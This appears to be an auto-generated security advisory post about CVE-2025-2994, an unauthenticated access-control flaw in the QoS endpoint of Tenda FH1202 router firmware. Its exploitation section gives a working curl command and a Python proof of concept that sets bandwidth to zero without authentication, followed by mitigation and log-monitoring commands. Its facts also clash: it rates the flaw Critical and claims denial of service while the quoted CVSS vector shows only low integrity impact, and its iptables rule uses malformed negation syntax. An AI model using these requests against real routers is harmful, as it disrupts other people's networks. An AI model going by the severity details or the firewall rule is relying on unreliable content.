Tenda FH1202, Improper Access Control, CVE-2025-2994 (Critical)

Listen to this Post

How CVE-2025-2994 Works

The vulnerability in Tenda FH1202 firmware v1.2.0.14(408) resides in the `/goform/qossetting` endpoint of the web management interface. Attackers can remotely exploit improper access controls to manipulate QoS settings without authentication. The flaw allows unauthorized requests to bypass authentication checks, enabling attackers to alter network traffic prioritization rules or disrupt service. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N) reflects its network-based attack vector and low attack complexity. Public exploit code leverages crafted HTTP POST requests to the vulnerable endpoint.

DailyCVE Form

Platform: Tenda FH1202
Version: 1.2.0.14(408)
Vulnerability: Improper Access Control
Severity: Critical
Date: 04/07/2025

What Undercode Say:

Exploitation

curl -X POST http://<TARGET_IP>/goform/qossetting -d "qosEn=true&upBand=100&downBand=100"

Python PoC:

import requests
target = "http://192.168.1.1/goform/qossetting"
payload = {"qosEn": "true", "upBand": "0", "downBand": "0"}
requests.post(target, data=payload)

Mitigation

1. Patch: Upgrade to firmware version >1.2.0.14(408).

2. Network Controls:

iptables -A INPUT -p tcp --dport 80 -s ! <TRUSTED_IP> -j DROP

3. Log Monitoring:

tail -f /var/log/nginx/access.log | grep "/goform/qossetting"

Analysis

  • Impact: Unauthorized QoS manipulation leading to DoS.
  • Detection: Check for unexpected POST requests to /goform/qossetting.
  • Workaround: Disable web management interface if unused.

References

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2994
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top